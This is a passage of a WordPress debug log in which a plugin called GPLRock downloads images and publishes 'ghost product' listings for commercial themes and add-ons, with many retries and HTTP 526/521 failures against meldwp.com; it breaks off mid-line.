09:58:40 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-gallery-themes-addon [05-Apr-2026 09:58:42 UTC] GPLRock: Image downloaded successfully for product searchwp-directorypress-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e43fc04b.jpg [05-Apr-2026 09:58:42 UTC] GPLRock: Using pre-downloaded image for product searchwp-directorypress-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e43fc04b.jpg [05-Apr-2026 09:58:42 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-directorypress-integration [05-Apr-2026 09:58:43 UTC] GPLRock: Image downloaded successfully for product give-moneris-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1944f17d.jpg [05-Apr-2026 09:58:43 UTC] GPLRock: Using pre-downloaded image for product give-moneris-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1944f17d.jpg [05-Apr-2026 09:58:43 UTC] GPLRock: Ghost product published with image - Product ID: give-moneris-gateway [05-Apr-2026 09:58:45 UTC] GPLRock: Image downloaded successfully for product elmastudio-baylys-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c9bfac0a.jpg [05-Apr-2026 09:58:45 UTC] GPLRock: Using pre-downloaded image for product elmastudio-baylys-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c9bfac0a.jpg [05-Apr-2026 09:58:45 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-baylys-wordpress-theme [05-Apr-2026 09:58:46 UTC] GPLRock: Image downloaded successfully for product woocommerce-snapscan-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f8bcecc4.jpg [05-Apr-2026 09:58:46 UTC] GPLRock: Using pre-downloaded image for product woocommerce-snapscan-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f8bcecc4.jpg [05-Apr-2026 09:58:46 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-snapscan-gateway [05-Apr-2026 09:58:47 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-user-history (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-412af066.jpg [05-Apr-2026 09:58:47 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-user-history: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-412af066.jpg [05-Apr-2026 09:58:48 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-user-history [05-Apr-2026 09:58:49 UTC] GPLRock: Image downloaded successfully for product learndash-lms-slack-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82ef7e75.jpg [05-Apr-2026 09:58:49 UTC] GPLRock: Using pre-downloaded image for product learndash-lms-slack-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82ef7e75.jpg [05-Apr-2026 09:58:49 UTC] GPLRock: Ghost product published with image - Product ID: learndash-lms-slack-integration [05-Apr-2026 09:58:51 UTC] GPLRock: Image downloaded successfully for product white-label-branding-for-wordpress-multisite (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cf20051d.jpg [05-Apr-2026 09:58:51 UTC] GPLRock: Using pre-downloaded image for product white-label-branding-for-wordpress-multisite: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cf20051d.jpg [05-Apr-2026 09:58:51 UTC] GPLRock: Ghost product published with image - Product ID: white-label-branding-for-wordpress-multisite [05-Apr-2026 09:58:52 UTC] GPLRock: Image downloaded successfully for product getleads-high-performance-landing-page-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a768087.jpg [05-Apr-2026 09:58:53 UTC] GPLRock: Using pre-downloaded image for product getleads-high-performance-landing-page-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a768087.jpg [05-Apr-2026 09:58:53 UTC] GPLRock: Ghost product published with image - Product ID: getleads-high-performance-landing-page-wordpress-theme [05-Apr-2026 09:59:44 UTC] GPLRock: Image download failed for product earls-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:59:46 UTC] GPLRock: Image download failed for product earls-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:59:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/earls---restaurant-wordpress-theme-14870.webp for product earls-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:59:48 UTC] GPLRock: Image download failed for product earls-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:59:50 UTC] GPLRock: Image download failed for product earls-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:59:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/earls---restaurant-wordpress-theme-14870.webp for product earls-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:59:52 UTC] GPLRock WARNING: Image download failed for product earls-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/earls---restaurant-wordpress-theme-14870.webp [05-Apr-2026 09:59:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: earls-restaurant-wordpress-theme [05-Apr-2026 09:59:52 UTC] GPLRock: Image download failed for product mana-responsive-multi-purpose-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:59:55 UTC] GPLRock: Image download failed for product mana-responsive-multi-purpose-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:59:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mana---responsive-multi-purpose-theme-26390.webp for product mana-responsive-multi-purpose-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:59:57 UTC] GPLRock: Image download failed for product mana-responsive-multi-purpose-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:59:59 UTC] GPLRock: Image download failed for product mana-responsive-multi-purpose-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mana---responsive-multi-purpose-theme-26390.webp for product mana-responsive-multi-purpose-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:00:01 UTC] GPLRock WARNING: Image download failed for product mana-responsive-multi-purpose-theme. URL: https://meldwp.com/wp-content/uploads/mana---responsive-multi-purpose-theme-26390.webp [05-Apr-2026 10:00:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mana-responsive-multi-purpose-theme [05-Apr-2026 10:00:01 UTC] GPLRock: Image download failed for product bootin-book-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:03 UTC] GPLRock: Image download failed for product bootin-book-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bootin---book-store-woocommerce-wordpress-theme-9396.webp for product bootin-book-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 521, Error: [05-Apr-2026 10:00:05 UTC] GPLRock: Image download failed for product bootin-book-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 521, Error: . Retrying... [05-Apr-2026 10:00:08 UTC] GPLRock: Image download failed for product bootin-book-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 521, Error: . Retrying... [05-Apr-2026 10:00:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bootin---book-store-woocommerce-wordpress-theme-9396.webp for product bootin-book-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:00:10 UTC] GPLRock WARNING: Image download failed for product bootin-book-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bootin---book-store-woocommerce-wordpress-theme-9396.webp [05-Apr-2026 10:00:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bootin-book-store-woocommerce-wordpress-theme [05-Apr-2026 10:00:10 UTC] GPLRock: Image downloaded successfully for product aball-creative-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0c56bceb.webp [05-Apr-2026 10:00:10 UTC] GPLRock: Using pre-downloaded image for product aball-creative-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0c56bceb.webp [05-Apr-2026 10:00:10 UTC] GPLRock: Ghost product published with image - Product ID: aball-creative-agency-wordpress-theme [05-Apr-2026 10:00:10 UTC] GPLRock: Image download failed for product ernest-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:12 UTC] GPLRock: Image download failed for product ernest-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ernest---creative-portfolio-wordpress-theme-5924.webp for product ernest-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:00:14 UTC] GPLRock: Image download failed for product ernest-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:16 UTC] GPLRock: Image download failed for product ernest-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ernest---creative-portfolio-wordpress-theme-5924.webp for product ernest-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:00:18 UTC] GPLRock WARNING: Image download failed for product ernest-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ernest---creative-portfolio-wordpress-theme-5924.webp [05-Apr-2026 10:00:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ernest-creative-portfolio-wordpress-theme [05-Apr-2026 10:00:19 UTC] GPLRock: Image download failed for product trucking-transportation-logistics-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:21 UTC] GPLRock: Image download failed for product trucking-transportation-logistics-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/trucking-transportation--logistics-html-template-15421.webp for product trucking-transportation-logistics-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:00:23 UTC] GPLRock: Image download failed for product trucking-transportation-logistics-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:25 UTC] GPLRock: Image download failed for product trucking-transportation-logistics-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/trucking-transportation--logistics-html-template-15421.webp for product trucking-transportation-logistics-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:00:27 UTC] GPLRock WARNING: Image download failed for product trucking-transportation-logistics-html-template. URL: https://meldwp.com/wp-content/uploads/trucking-transportation--logistics-html-template-15421.webp [05-Apr-2026 10:00:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: trucking-transportation-logistics-html-template [05-Apr-2026 10:00:27 UTC] GPLRock: Image download failed for product beauty-salon-construction-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:29 UTC] GPLRock: Image download failed for product beauty-salon-construction-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/beauty-salon--construction-services-wordpress-theme-18523.webp for product beauty-salon-construction-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:00:32 UTC] GPLRock: Image download failed for product beauty-salon-construction-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:34 UTC] GPLRock: Image download failed for product beauty-salon-construction-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/beauty-salon--construction-services-wordpress-theme-18523.webp for product beauty-salon-construction-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:00:36 UTC] GPLRock WARNING: Image download failed for product beauty-salon-construction-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/beauty-salon--construction-services-wordpress-theme-18523.webp [05-Apr-2026 10:00:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: beauty-salon-construction-services-wordpress-theme [05-Apr-2026 10:00:36 UTC] GPLRock: Image download failed for product readme-a-readable-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:38 UTC] GPLRock: Image download failed for product readme-a-readable-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/readme---a-readable-wordpress-theme-11491.webp for product readme-a-readable-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:00:41 UTC] GPLRock: Image download failed for product readme-a-readable-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:43 UTC] GPLRock: Image download failed for product readme-a-readable-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/readme---a-readable-wordpress-theme-11491.webp for product readme-a-readable-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:00:45 UTC] GPLRock WARNING: Image download failed for product readme-a-readable-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/readme---a-readable-wordpress-theme-11491.webp [05-Apr-2026 10:00:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: readme-a-readable-wordpress-theme [05-Apr-2026 10:00:45 UTC] GPLRock: Image download failed for product dunker-fashion-and-clothing-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:47 UTC] GPLRock: Image download failed for product dunker-fashion-and-clothing-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dunker---fashion-and-clothing-shop-wordpress-theme-33695.webp for product dunker-fashion-and-clothing-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:00:49 UTC] GPLRock: Image download failed for product dunker-fashion-and-clothing-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:51 UTC] GPLRock: Image download failed for product dunker-fashion-and-clothing-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dunker---fashion-and-clothing-shop-wordpress-theme-33695.webp for product dunker-fashion-and-clothing-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:00:54 UTC] GPLRock WARNING: Image download failed for product dunker-fashion-and-clothing-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dunker---fashion-and-clothing-shop-wordpress-theme-33695.webp [05-Apr-2026 10:00:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dunker-fashion-and-clothing-shop-wordpress-theme [05-Apr-2026 10:00:54 UTC] GPLRock: Image download failed for product intime-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:56 UTC] GPLRock: Image download failed for product intime-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:00:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/intime---business-consulting-wordpress-theme-14230.webp for product intime-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:00:58 UTC] GPLRock: Image download failed for product intime-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:01:00 UTC] GPLRock: Image download failed for product intime-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:01:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/intime---business-consulting-wordpress-theme-14230.webp for product intime-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:01:02 UTC] GPLRock WARNING: Image download failed for product intime-business-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/intime---business-consulting-wordpress-theme-14230.webp [05-Apr-2026 10:01:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: intime-business-consulting-wordpress-theme [05-Apr-2026 10:01:21 UTC] GPLRock: Image downloaded successfully for product everest-forms-google-sheets (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ce02e1dc.jpg [05-Apr-2026 10:01:21 UTC] GPLRock: Using pre-downloaded image for product everest-forms-google-sheets: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ce02e1dc.jpg [05-Apr-2026 10:01:21 UTC] GPLRock: Ghost product published with image - Product ID: everest-forms-google-sheets [05-Apr-2026 10:01:22 UTC] GPLRock: Image downloaded successfully for product everest-forms-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3b6d5e0b.jpg [05-Apr-2026 10:01:22 UTC] GPLRock: Using pre-downloaded image for product everest-forms-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3b6d5e0b.jpg [05-Apr-2026 10:01:22 UTC] GPLRock: Ghost product published with image - Product ID: everest-forms-pro [05-Apr-2026 10:01:24 UTC] GPLRock: Image downloaded successfully for product cityo-multiple-listing-directory-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9f5b00a2.jpg [05-Apr-2026 10:01:24 UTC] GPLRock: Using pre-downloaded image for product cityo-multiple-listing-directory-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9f5b00a2.jpg [05-Apr-2026 10:01:24 UTC] GPLRock: Ghost product published with image - Product ID: cityo-multiple-listing-directory-wordpress-theme [05-Apr-2026 10:01:26 UTC] GPLRock: Image downloaded successfully for product wordpress-event-manager-event-calendar-and-booking-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d96deb49.png [05-Apr-2026 10:01:26 UTC] GPLRock: Using pre-downloaded image for product wordpress-event-manager-event-calendar-and-booking-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d96deb49.png [05-Apr-2026 10:01:26 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-event-manager-event-calendar-and-booking-plugin [05-Apr-2026 10:01:28 UTC] GPLRock: Image downloaded successfully for product foodbook-tips-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bd0870de.jpg [05-Apr-2026 10:01:28 UTC] GPLRock: Using pre-downloaded image for product foodbook-tips-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bd0870de.jpg [05-Apr-2026 10:01:28 UTC] GPLRock: Ghost product published with image - Product ID: foodbook-tips-add-on [05-Apr-2026 10:01:30 UTC] GPLRock: Image downloaded successfully for product foodbook-multi-delivery-fees-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-34cec4ba.jpg [05-Apr-2026 10:01:30 UTC] GPLRock: Using pre-downloaded image for product foodbook-multi-delivery-fees-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-34cec4ba.jpg [05-Apr-2026 10:01:30 UTC] GPLRock: Ghost product published with image - Product ID: foodbook-multi-delivery-fees-add-on [05-Apr-2026 10:01:31 UTC] GPLRock: Image downloaded successfully for product foodbook-multibranch-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf0cbb3d.jpg [05-Apr-2026 10:01:32 UTC] GPLRock: Using pre-downloaded image for product foodbook-multibranch-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf0cbb3d.jpg [05-Apr-2026 10:01:32 UTC] GPLRock: Ghost product published with image - Product ID: foodbook-multibranch-add-on [05-Apr-2026 10:01:33 UTC] GPLRock: Image downloaded successfully for product iconic-woocommerce-account-pages (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fc6c7467.jpg [05-Apr-2026 10:01:33 UTC] GPLRock: Using pre-downloaded image for product iconic-woocommerce-account-pages: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fc6c7467.jpg [05-Apr-2026 10:01:33 UTC] GPLRock: Ghost product published with image - Product ID: iconic-woocommerce-account-pages [05-Apr-2026 10:01:34 UTC] GPLRock: Image downloaded successfully for product iconic-woocommerce-bundled-products (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ef71cd96.jpg [05-Apr-2026 10:01:34 UTC] GPLRock: Using pre-downloaded image for product iconic-woocommerce-bundled-products: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ef71cd96.jpg [05-Apr-2026 10:01:34 UTC] GPLRock: Ghost product published with image - Product ID: iconic-woocommerce-bundled-products [05-Apr-2026 10:01:36 UTC] GPLRock: Image downloaded successfully for product iconic-woocommerce-attribute-swatches (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-35da90d9.jpg [05-Apr-2026 10:01:36 UTC] GPLRock: Using pre-downloaded image for product iconic-woocommerce-attribute-swatches: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-35da90d9.jpg [05-Apr-2026 10:01:36 UTC] GPLRock: Ghost product published with image - Product ID: iconic-woocommerce-attribute-swatches [05-Apr-2026 10:02:30 UTC] GPLRock: Image download failed for product louie-modern-portfolio-theme-for-agencies (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:02:32 UTC] GPLRock: Image download failed for product louie-modern-portfolio-theme-for-agencies (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:02:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/louie---modern-portfolio-theme-for-agencies-31437.webp for product louie-modern-portfolio-theme-for-agencies after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:02:34 UTC] GPLRock: Image download failed for product louie-modern-portfolio-theme-for-agencies (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:02:36 UTC] GPLRock: Image download failed for product louie-modern-portfolio-theme-for-agencies (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:02:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/louie---modern-portfolio-theme-for-agencies-31437.webp for product louie-modern-portfolio-theme-for-agencies after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:02:39 UTC] GPLRock WARNING: Image download failed for product louie-modern-portfolio-theme-for-agencies. URL: https://meldwp.com/wp-content/uploads/louie---modern-portfolio-theme-for-agencies-31437.webp [05-Apr-2026 10:02:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: louie-modern-portfolio-theme-for-agencies [05-Apr-2026 10:02:39 UTC] GPLRock: Image download failed for product zephys-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:02:41 UTC] GPLRock: Image download failed for product zephys-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:02:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zephys---architecture-wordpress-theme-27684.webp for product zephys-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:02:43 UTC] GPLRock: Image download failed for product zephys-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:02:45 UTC] GPLRock: Image download failed for product zephys-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:02:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zephys---architecture-wordpress-theme-27684.webp for product zephys-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:02:47 UTC] GPLRock WARNING: Image download failed for product zephys-architecture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zephys---architecture-wordpress-theme-27684.webp [05-Apr-2026 10:02:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zephys-architecture-wordpress-theme [05-Apr-2026 10:02:47 UTC] GPLRock: Image download failed for product deadlift-fitnesss-and-bodybuilding-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:02:50 UTC] GPLRock: Image download failed for product deadlift-fitnesss-and-bodybuilding-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:02:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/deadlift---fitnesss-and-bodybuilding-wordpress-theme-892.webp for product deadlift-fitnesss-and-bodybuilding-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:02:52 UTC] GPLRock: Image download failed for product deadlift-fitnesss-and-bodybuilding-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:02:54 UTC] GPLRock: Image download failed for product deadlift-fitnesss-and-bodybuilding-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:02:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/deadlift---fitnesss-and-bodybuilding-wordpress-theme-892.webp for product deadlift-fitnesss-and-bodybuilding-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:02:56 UTC] GPLRock WARNING: Image download failed for product deadlift-fitnesss-and-bodybuilding-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/deadlift---fitnesss-and-bodybuilding-wordpress-theme-892.webp [05-Apr-2026 10:02:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: deadlift-fitnesss-and-bodybuilding-wordpress-theme [05-Apr-2026 10:02:56 UTC] GPLRock: Image download failed for product river-retina-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:02:58 UTC] GPLRock: Image download failed for product river-retina-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/river---retina-multi-purpose-wordpress-theme-22923.webp for product river-retina-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:03:01 UTC] GPLRock: Image download failed for product river-retina-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:03 UTC] GPLRock: Image download failed for product river-retina-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/river---retina-multi-purpose-wordpress-theme-22923.webp for product river-retina-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:03:05 UTC] GPLRock WARNING: Image download failed for product river-retina-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/river---retina-multi-purpose-wordpress-theme-22923.webp [05-Apr-2026 10:03:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: river-retina-multi-purpose-wordpress-theme [05-Apr-2026 10:03:05 UTC] GPLRock: Image download failed for product omens-multipurpose-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:07 UTC] GPLRock: Image download failed for product omens-multipurpose-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/omens---multipurpose-creative-wordpress-theme-30043.webp for product 